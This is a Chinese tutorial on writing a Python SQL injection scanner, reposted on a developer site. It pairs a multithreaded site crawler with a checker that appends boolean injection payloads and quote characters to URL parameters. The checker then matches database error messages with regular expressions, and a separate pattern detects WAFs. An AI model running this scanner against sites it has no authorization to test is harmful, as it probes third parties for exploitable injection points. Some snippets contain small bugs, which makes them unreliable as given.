内容简介:首先需要开发一个爬虫用于收集网站的链接,爬虫需要记录已经爬取的链接和待爬取的链接,并且去重,用Python的请安装这些库实验环境是Linux,创建一个
扫描器需要实现的功能思维导图
爬虫编写思路
首先需要开发一个爬虫用于收集网站的链接,爬虫需要记录已经爬取的链接和待爬取的链接,并且去重,用 Python 的 set()
就可以解决,大概流程是:
- 输入URL
- 下载解析出URL
- URL去重,判断是否为本站
- 加入到待爬列表
- 重复循环
SQL判断思路
- 通过在URL后面加上
AND %d=%d
或者OR NOT (%d>%d)
-
%d
后面的数字是随机可变的 - 然后搜索网页中特殊关键词,比如:
MySQL 中是 SQL syntax.*MySQL Microsoft SQL Server 是 Warning.*mssql_ Microsoft Access 是 Microsoft Access Driver Oracle 是 Oracle error IBM DB2 是 DB2 SQL error SQLite 是 SQLite.Exception ...
- 通过这些关键词就可以判断出所用的数据库
- 还需要判断一下waf之类的东西,有这种东西就直接停止。简单的方法就是用特定的URL访问,如果出现了像
IP banned
,fierwall
之类的关键词,可以判断出是waf
。具体的正则表达式是(?i)(\A|\b)IP\b.*\b(banned|blocked|bl(a|o)ck\s?list|firewall)
开发准备
请安装这些库
pip install requests pip install beautifulsoup4
实验环境是Linux,创建一个 Code
目录,在其中创建一个 work
文件夹,将其作为工作目录
目录结构
/w8ay.py // 项目启动主文件 /lib/core // 核心文件存放目录 /lib/core/config.py // 配置文件 /script // 插件存放 /exp // exp和poc存放
步骤
SQL检测脚本编写
DBMS_ERRORS = { 'MySQL': (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."), "PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."), "Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."), "Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"), "Oracle": (r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"), "IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("), "SQLite": (r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"), "Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"), }
通过正则表达式就可以判断出是哪个数据库了
for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]): if (re.search(regex,_content)): return True
下面是我们测试语句的 payload
BOOLEAN_TESTS = (" AND %d=%d", " OR NOT (%d=%d)")
用报错语句返回正确的内容和错误的内容进行对比
for test_payload in BOOLEAN_TESTS: # Right Page RANDINT = random.randint(1, 255) _url = url + test_payload % (RANDINT, RANDINT) content["true"] = Downloader.get(_url) _url = url + test_payload % (RANDINT, RANDINT + 1) content["false"] = Downloader.get(_url) if content["origin"] == content["true"] != content["false"]: return "sql found: %" % url
这句
content["origin"] == content["true"] != content["false"]
意思就是当原始网页等于正确的网页不等于错误的网页内容时,就可以判定这个地址存在注入漏洞
完整代码:
import re, random from lib.core import Download def sqlcheck(url): if (not url.find("?")): # Pseudo-static page return false; Downloader = Download.Downloader() BOOLEAN_TESTS = (" AND %d=%d", " OR NOT (%d=%d)") DBMS_ERRORS = { # regular expressions used for DBMS recognition based on error message response "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."), "PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."), "Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."), "Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"), "Oracle": (r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"), "IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("), "SQLite": (r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"), "Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"), } _url = url + "%29%28%22%27" _content = Downloader.get(_url) for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]): if (re.search(regex,_content)): return True content = {} content['origin'] = Downloader.get(_url) for test_payload in BOOLEAN_TESTS: # Right Page RANDINT = random.randint(1, 255) _url = url + test_payload % (RANDINT, RANDINT) content["true"] = Downloader.get(_url) _url = url + test_payload % (RANDINT, RANDINT + 1) content["false"] = Downloader.get(_url) if content["origin"] == content["true"] != content["false"]: return "sql found: %" % url
将这个文件命名为 sqlcheck.py
,放在 /script
目录中。代码的第4行作用是查找URL是否包含 ?
,如果不包含,比方说伪静态页面,可能不太好注入,因此需要过滤掉
爬虫的编写
爬虫的思路上面讲过了,先完成URL的管理,我们单独将它作为一个类,文件保存在 /lib/core/UrlManager.py
#-*- coding:utf-8 -*- class UrlManager(object): def __init__(self): self.new_urls = set() self.old_urls = set() def add_new_url(self, url): if url is None: return if url not in self.new_urls and url not in self.old_urls: self.new_urls.add(url) def add_new_urls(self, urls): if urls is None or len(urls) == 0: return for url in urls: self.add_new_url(url) def has_new_url(self): return len(self.new_urls) != 0 def get_new_url(self): new_url = self.new_urls.pop() self.old_urls.add(new_url) return new_url
为了方便,我们也将下载功能单独作为一个类使用,文件保存在 lib/core/Downloader.py
#-*- coding:utf-8 -*- import requests class Downloader(object): def get(self, url): r = requests.get(url, timeout = 10) if r.status_code != 200: return None _str = r.text return _str def post(self, url, data): r = requests.post(url, data) _str = r.text return _str def download(self, url, htmls): if url is None: return None _str = {} _str["url"] = url try: r = requests.get(url, timeout = 10) if r.status_code != 200: return None _str["html"] = r.text except Exception as e: return None htmls.append(_str)
特别说明,因为我们要写的爬虫是多线程的,所以类中有个 download
方法是专门为多线程下载专用的
在 lib/core/Spider.py
中编写爬虫
#-*- coding:utf-8 -*- from lib.core import Downloader, UrlManager import threading from urllib import parse from urllib.parse import urljoin from bs4 import BeautifulSoup class SpiderMain(object): def __init__(self, root, threadNum): self.urls = UrlManager.UrlManager() self.download = Downloader.Downloader() self.root = root self.threadNum = threadNum def _judge(self, domain, url): if (url.find(domain) != -1): return True return False def _parse(self, page_url, content): if content is None: return soup = BeautifulSoup(content, 'html.parser') _news = self._get_new_urls(page_url, soup) return _news def _get_new_urls(self, page_url, soup): new_urls = set() links = soup.find_all('a') for link in links: new_url = link.get('href') new_full_url = urljoin(page_url, new_url) if (self._judge(self.root, new_full_url)): new_urls.add(new_full_url) return new_urls def craw(self): self.urls.add_new_url(self.root) while self.urls.has_new_url(): _content = [] th = [] for i in list(range(self.threadNum)): if self.urls.has_new_url() is False: break new_url = self.urls.get_new_url() ## sql check try: if (sqlcheck.sqlcheck(new_url)): print("url:%s sqlcheck is valueable" % new_url) except: pass print("craw:" + new_url) t = threading.Thread(target = self.download.download, args = (new_url, _content)) t.start() th.append(t) for t in th: t.join() for _str in _content: if _str is None: continue new_urls = self._parse(new_url, _str["html"]) self.urls.add_new_urls(new_urls)
爬虫通过调用 craw()
方法传入一个网址进行爬行,然后采用多线程的方法下载待爬行的网站,下载之后的源码用 _parse
方法调用 BeautifulSoup
进行解析,之后将解析出的URL列表丢入URL管理器,这样循环,最后只要爬完了网页,爬虫就会停止
threading
库可以自定义需要开启的线程数,线程开启后,每个线程会得到一个url进行下载,然后线程会阻塞,阻塞完毕后线程放行
爬虫和SQL检查的结合
在 lib/core/Spider.py
文件引用一下 from script import sqlcheck
,在 craw()
方法中,取出新的URL地方调用一下
##sql check try: if(sqlcheck.sqlcheck(new_url)): print("url:%s sqlcheck is valueable"%new_url) except: pass
用 try
检测可能出现的异常,绕过它,在文件 w8ay.py
中进行测试
#-*- coding:utf-8 -*- ''' Name: w8ayScan Author: mathor Copyright (c) 2019 ''' import sys from lib.core.Spider import SpiderMain def main(): root = "https://wmathor.com" threadNum = 50 w8 = SpiderMain(root, threadNum) w8.craw() if __name__ == "__main__": main()
很重要的一点!为了使得 lib
和 script
文件夹中的 .py
文件可以可以被认作是模块,请在 lib
、 lib/core
和 script
文件夹中创建 __init__.py
文件,文件中什么都不需要写
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- WordPress Plugin AutoSuggest插件SQL注入复现与分析
- WordPress插件Form Maker SQL注入漏洞分析
- Angular 4 依赖注入教程之二 组件中注入服务
- 服务端注入之Flask框架中服务端模板注入问题
- 服务器端电子表格注入 - 从公式注入到远程代码执行
- SQL注入测试技巧TIP:再从Mysql注入绕过过滤说起
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Algorithms + Data Structures = Programs
Niklaus Wirth / Prentice Hall / 1975-11-11 / GBP 84.95
It might seem completely dated with all its examples written in the now outmoded Pascal programming language (well, unless you are one of those Delphi zealot trying to resist to the Java/.NET dominanc......一起来看看 《Algorithms + Data Structures = Programs》 这本书的介绍吧!